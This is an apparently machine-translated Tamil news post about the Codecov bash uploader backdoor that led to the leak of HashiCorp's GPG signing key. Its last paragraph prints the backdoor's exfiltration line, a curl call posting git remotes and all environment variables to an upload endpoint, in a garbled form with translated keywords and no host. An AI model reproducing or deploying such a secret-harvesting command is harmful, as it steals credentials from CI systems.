புரோஹோஸ்டர் > Блог > இணைய செய்தி > கோட்கோவ் ஸ்கிரிப்ட்டில் தீங்கிழைக்கும் குறியீட்டை அறிமுகப்படுத்தியது ஹாஷிகார்ப் பிஜிபி விசையின் சமரசத்திற்கு வழிவகுத்தது.

கோட்கோவ் ஸ்கிரிப்ட்டில் தீங்கிழைக்கும் குறியீட்டை அறிமுகப்படுத்தியது ஹாஷிகார்ப் பிஜிபி விசையின் சமரசத்திற்கு வழிவகுத்தது.

திறந்த மூல கருவிகளான Vagrant, Packer, Nomad மற்றும் Terraform ஆகியவற்றை உருவாக்குவதற்கு பெயர் பெற்ற HashiCorp, வெளியீடுகளைச் சரிபார்க்கும் டிஜிட்டல் கையொப்பங்களை உருவாக்கப் பயன்படுத்தப்படும் தனிப்பட்ட GPG விசையின் கசிவை அறிவித்தது. GPG விசைக்கான அணுகலைப் பெற்ற தாக்குபவர்கள் சரியான டிஜிட்டல் கையொப்பத்துடன் சரிபார்ப்பதன் மூலம் HashiCorp தயாரிப்புகளில் மறைக்கப்பட்ட மாற்றங்களைச் செய்யலாம். அதே நேரத்தில், தணிக்கையின் போது, ​​அத்தகைய மாற்றங்களைச் செய்வதற்கான முயற்சிகளின் தடயங்கள் அடையாளம் காணப்படவில்லை என்று நிறுவனம் கூறியது.

தற்போது, ​​சமரசம் செய்யப்பட்ட ஜிபிஜி விசை ரத்து செய்யப்பட்டு, அதற்கு பதிலாக புதிய விசை அறிமுகப்படுத்தப்பட்டுள்ளது. சிக்கல் SHA256SUM மற்றும் SHA256SUM.sig கோப்புகளைப் பயன்படுத்தி சரிபார்ப்பை மட்டுமே பாதித்தது, மேலும் releases.hashicorp.com மூலம் வழங்கப்பட்ட Linux DEB மற்றும் RPM தொகுப்புகளுக்கான டிஜிட்டல் கையொப்பங்களின் உருவாக்கத்தையும், macOS மற்றும் Windows (AuthentiCode)க்கான சரிபார்ப்பு வழிமுறைகளையும் பாதிக்கவில்லை. .

தொடர்ச்சியான ஒருங்கிணைப்பு அமைப்புகளிலிருந்து கவரேஜ் அறிக்கைகளைப் பதிவிறக்க வடிவமைக்கப்பட்ட உள்கட்டமைப்பில் கோட்கோவ் பாஷ் அப்லோடர் (codecov-bash) ஸ்கிரிப்டைப் பயன்படுத்தியதால் கசிவு ஏற்பட்டது. கோட்கோவ் நிறுவனத்தின் மீதான தாக்குதலின் போது, ​​குறிப்பிட்ட ஸ்கிரிப்ட்டில் ஒரு பின்கதவு மறைக்கப்பட்டது, இதன் மூலம் கடவுச்சொற்கள் மற்றும் குறியாக்க விசைகள் தாக்குபவர்களின் சேவையகத்திற்கு அனுப்பப்பட்டன.

ஹேக் செய்ய, கோட்கோவ் டோக்கர் படத்தை உருவாக்கும் செயல்பாட்டில் உள்ள பிழையை தாக்குபவர்கள் பயன்படுத்திக் கொண்டனர், இது கோட்கோவ்.ஐஓவில் இருந்து விநியோகிக்கப்பட்ட பாஷ் அப்லோடர் ஸ்கிரிப்டில் மாற்றங்களைச் செய்வதற்குத் தேவையான ஜிசிஎஸ் (கூகுள் கிளவுட் ஸ்டோரேஜ்) க்கு அணுகல் தரவைப் பிரித்தெடுக்க அனுமதித்தது. இணையதளம். மாற்றங்கள் ஜனவரி 31 அன்று மீண்டும் செய்யப்பட்டன, இரண்டு மாதங்கள் கண்டறியப்படாமல் இருந்தன, மேலும் வாடிக்கையாளர் தொடர்ச்சியான ஒருங்கிணைப்பு அமைப்பு சூழல்களில் சேமிக்கப்பட்ட தகவல்களைப் பிரித்தெடுக்க தாக்குபவர்களை அனுமதித்தது. சேர்க்கப்பட்ட தீங்கிழைக்கும் குறியீட்டைப் பயன்படுத்தி, தாக்குபவர்கள் சோதனை செய்யப்பட்ட Git களஞ்சியம் மற்றும் பயன்பாட்டுக் குறியீடு, களஞ்சியங்கள் மற்றும் Amazon Web Services மற்றும் GitHub போன்ற சேவைகளுக்கான அணுகலை ஒழுங்கமைக்க தொடர்ச்சியான ஒருங்கிணைப்பு அமைப்புகளுக்கு அனுப்பப்படும் டோக்கன்கள், குறியாக்க விசைகள் மற்றும் கடவுச்சொற்கள் உட்பட அனைத்து சூழல் மாறிகள் பற்றிய தகவலைப் பெறலாம்.

நேரடி அழைப்புக்கு கூடுதலாக, Codecov-action (Github), Codecov-circleci-orb மற்றும் Codecov-bitrise-step போன்ற பிற பதிவேற்றிகளின் ஒரு பகுதியாக Codecov Bash Uploader ஸ்கிரிப்ட் பயன்படுத்தப்பட்டது, அதன் பயனர்களும் சிக்கலால் பாதிக்கப்பட்டுள்ளனர். codecov-bash மற்றும் தொடர்புடைய தயாரிப்புகளின் அனைத்து பயனர்களும் தங்கள் உள்கட்டமைப்புகளைத் தணிக்கை செய்ய பரிந்துரைக்கப்படுகிறார்கள், அத்துடன் கடவுச்சொற்கள் மற்றும் குறியாக்க விசைகளை மாற்றவும். சுருள் -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || உண்மை

ஆதாரம்: opennet.ru

கருத்தைச் சேர்